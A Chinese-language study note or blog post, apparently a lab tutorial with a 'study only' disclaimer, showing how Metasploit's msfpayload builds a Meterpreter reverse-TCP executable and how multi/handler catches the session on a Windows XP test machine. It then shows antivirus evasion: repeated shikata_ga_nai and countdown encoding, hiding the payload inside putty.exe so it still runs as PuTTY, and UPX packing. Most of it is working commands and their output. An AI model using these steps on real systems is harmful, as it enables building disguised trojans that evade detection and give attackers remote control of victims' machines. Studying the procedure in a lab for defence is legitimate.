!!!笔记仅供学习交流使用,请勿进行其他用途!!!
CONTENTS
msfpayload的使用方法:
使用msfpayload生成payload:
root@kali:~# msfpayload
Usage: /opt/metasploit/apps/pro/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>
OPTIONS:
-h Help banner
-l List available payloads
#==>>参看可用的payload:
root@kali:~# msfpayload -l
Framework Payloads (335 total)
==============================
Name Description
---- -----------
。。。。。。
。。。。。。
#==>>使用某个payload,并且输入“O”(大写字母O)查看选项:
root@kali:~# msfpayload windows/meterpreter/reverse_tcp O
Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
Module: payload/windows/meterpreter/reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 287
Rank: Normal
Provided by:
skape <mmiller@hick.org>
sf <stephen_fewer@harmonysecurity.com>
hdm <hdm@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 10.10.10.130 yes The listen address
LPORT 4444 yes The listen port
Description:
Connect back to the attacker, Inject the meterpreter server DLL via
the Reflective Dll Injection payload (staged)
#==>>LHOST和LPORT都是正确的,直接生成可执行文件
root@kali:~# msfpayload windows/meterpreter/reverse_tcp X > test.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 287
Options: {"LHOST"=>"10.10.10.130"}
将该可执行文件上传到WinXPSP2中,然后进入msf中:
#==>>首先找到对应的模块 msf > search multi/handler Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- 。。。。。。 exploit/multi/handler manual Generic Payload Handler 。。。。。。 msf > use exploit/multi/handler msf exploit(handler) > show payloads 。。。。。。 #==>>找到和生成exe文件相对应的payload msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) >show options #==>>查看,修改选项 Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set LHOST 10.10.10.130 LHOST => 10.10.10.130 msf exploit(handler) > exploit #==>>msf开始监听后,就可以在XP中执行test.exe文件,就会发现渗透成功了 [*] Started reverse handler on 10.10.10.130:4444 [*] Starting the payload handler... [*] Sending stage (769536 bytes) to 10.10.10.132 [*] Meterpreter session 1 opened (10.10.10.130:4444 -> 10.10.10.132:1047) at 2014-05-12 17:44:06 +0800 meterpreter > #==>>渗透成功
我们用msfpayload直接生成的payload非常容易被检测为木马,这里需要进行下免杀处理。先笔记个网址【 https://www.virustotal.com/zh-cn 】,可以在线检测木马。
msfencode:
root@kali:~/payloadtest# msfencode -h
Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff'
-c <opt> The number of times to encode the data
-d <opt> Specify the directory in which to look for EXE templates
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The output format: bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war
-v Increase verbosity
-x <opt> Specify an alternate executable template
#==>>可用的编码器
root@kali:~/payloadtest# msfencode -l
Framework Encoders
==================
Name Rank Description
---- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder
mipsbe/longxor normal XOR Encoder
mipsle/byte_xori normal Byte XORi Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
简单的使用实例:
#==>>使用msfpayload生成payload,使用R关键字输出原始数据,然后通过管道符号| 送到msfencode中,msfencode使用shikata_ga_nai编码一次,输出exe文件格式,输出名称为test2.exe root@kali:~/payloadtest# msfpayload windows/meterpreter/reverse_tcp R | msfencode -e x86/shikata_ga_nai -c 1 -t exe -o test2.exe [*] x86/shikata_ga_nai succeeded with size 314 (iteration=1) #==>>使用msfpayload生成payload,使用R关键字输出原始数据,将原始数据保存在test.raw文件中,msfencode使用shikata_ga_nai编码一次,输出exe文件格式,输入数据来自test.raw,输出名称为test2.exe root@kali:~/payloadtest# msfpayload windows/meterpreter/reverse_tcp R > test.raw root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1 -t exe -i test.raw -o test3.exe [*] x86/shikata_ga_nai succeeded with size 314 (iteration=1) #==>>msfencode使用shikata_ga_nai编码一次,输出原始数据,输入数据来自test.raw,然后将输出的原始数据通过管道符号再次送到msfencode中,这里在使用countdown编码一次,输出exe文件格式,输出名称为test4.exe root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1 -i test.raw -t raw | msfencode -e x86/countdown -c 1 -t exe -o test4.exe [*] x86/shikata_ga_nai succeeded with size 314 (iteration=1) [*] x86/countdown succeeded with size 332 (iteration=1) #==>>msfencode使用shikata_ga_nai编码一次,输出exe文件格式,输入数据来自test.raw,输出名称为sickputty.exe,不使用默认的编码模板,使用putty.exe作为编码模板(-x 选项),同时生成的sickputty.exe执行时依然可以运行putty(-k选项) root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1 -t exe -i test.raw -o sickputty.exe -x ./putty.exe -k [*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)
UPX:
root@kali:~/payloadtest# upx
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
Commands:
-1 compress faster -9 compress better
-d decompress -l list compressed file
-t test compressed file -V display version number
-h give more help -L display software license
Options:
-q be quiet -v be verbose
-oFILE write output to 'FILE'
-f force compression of suspicious files
-k keep backup files
file.. executables to (de)compress
Type 'upx --help' for more detailed help.
UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net
root@kali:~/payloadtest# upx -h
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
Commands:
-1 compress faster -9 compress better
--best compress best (can be slow for big files)
-d decompress -l list compressed file
-t test compressed file -V display version number
-h give this help -L display software license
Options:
-q be quiet -v be verbose
-oFILE write output to 'FILE'
-f force compression of suspicious files
--no-color, --mono, --color, --no-progress change look
Compression tuning options:
--brute try all available compression methods & filters [slow]
--ultra-brute try even more compression variants [very slow]
Backup options:
-k, --backup keep backup files
--no-backup no backup files [default]
Overlay options:
--overlay=copy copy any extra data attached to the file [default]
--overlay=strip strip any extra data attached to the file [DANGEROUS]
--overlay=skip don't compress a file with an overlay
Options for djgpp2/coff:
--coff produce COFF output [default: EXE]
Options for dos/com:
--8086 make compressed com work on any 8086
Options for dos/exe:
--8086 make compressed exe work on any 8086
--no-reloc put no relocations in to the exe header
Options for dos/sys:
--8086 make compressed sys work on any 8086
Options for ps1/exe:
--8-bit uses 8 bit size compression [default: 32 bit]
--8mib-ram 8 megabyte memory limit [default: 2 MiB]
--boot-only disables client/host transfer compatibility
--no-align don't align to 2048 bytes [enables: --console-run]
Options for watcom/le:
--le produce LE output [default: EXE]
Options for win32/pe, rtm32/pe & arm/pe:
--compress-exports=0 do not compress the export section
--compress-exports=1 compress the export section [default]
--compress-icons=0 do not compress any icons
--compress-icons=1 compress all but the first icon
--compress-icons=2 compress all but the first icon directory [default]
--compress-icons=3 compress all icons
--compress-resources=0 do not compress any resources at all
--keep-resource=list do not compress resources specified by list
--strip-relocs=0 do not strip relocations
--strip-relocs=1 strip relocations [default]
file.. executables to (de)compress
This version supports:
AMD64-darwin.macho Mach/AMD64
ARMEL-darwin.macho Mach/ARMEL
amd64-linux.elf linux/ElfAMD
amd64-linux.kernel.vmlinux vmlinux/AMD64
arm-linux.elf linux/armel
arm-linux.kernel.vmlinux vmlinux/armel
arm-wince.pe arm/pe
armeb-linux.elf linux/armeb
armeb-linux.kernel.vmlinux vmlinux/armeb
armel-linux.kernel.vmlinuz vmlinuz/armel
fat-darwin.macho Mach/fat
i086-dos16.com dos/com
i086-dos16.exe dos/exe
i086-dos16.sys dos/sys
i386-bsd.elf.execve BSD/386
i386-darwin.macho Mach/i386
i386-dos32.djgpp2.coff djgpp2/coff
i386-dos32.tmt.adam tmt/adam
i386-dos32.watcom.le watcom/le
i386-freebsd.elf BSD/elf386
i386-linux.elf linux/elf386
i386-linux.elf.execve linux/386
i386-linux.elf.shell linux/sh386
i386-linux.kernel.bvmlinuz bvmlinuz/386
i386-linux.kernel.vmlinux vmlinux/386
i386-linux.kernel.vmlinuz vmlinuz/386
i386-netbsd.elf netbsd/elf386
i386-openbsd.elf opnbsd/elf386
i386-win32.pe win32/pe
m68k-atari.tos atari/tos
mips-linux.elf linux/mipseb
mipsel-linux.elf linux/mipsel
mipsel.r3000-ps1 ps1/exe
powerpc-darwin.macho Mach/ppc32
powerpc-linux.elf linux/ElfPPC
powerpc-linux.kernel.vmlinux vmlinux/ppc32
UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net
root@kali:~/payloadtest#
简单的使用实例:
#==>>使用压缩等级为5,进行压缩test4.exe
root@kali:~/payloadtest# upx -5 test4.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011
File size Ratio Format Name
-------------------- ------ ----------- -----------
73802 -> 48128 65.21% win32/pe test4.exe
Packed 1 file.
其他参考链接:
【 http://www.offensive-security.com/metasploit-unleashed/Msfpayload 】
发表评论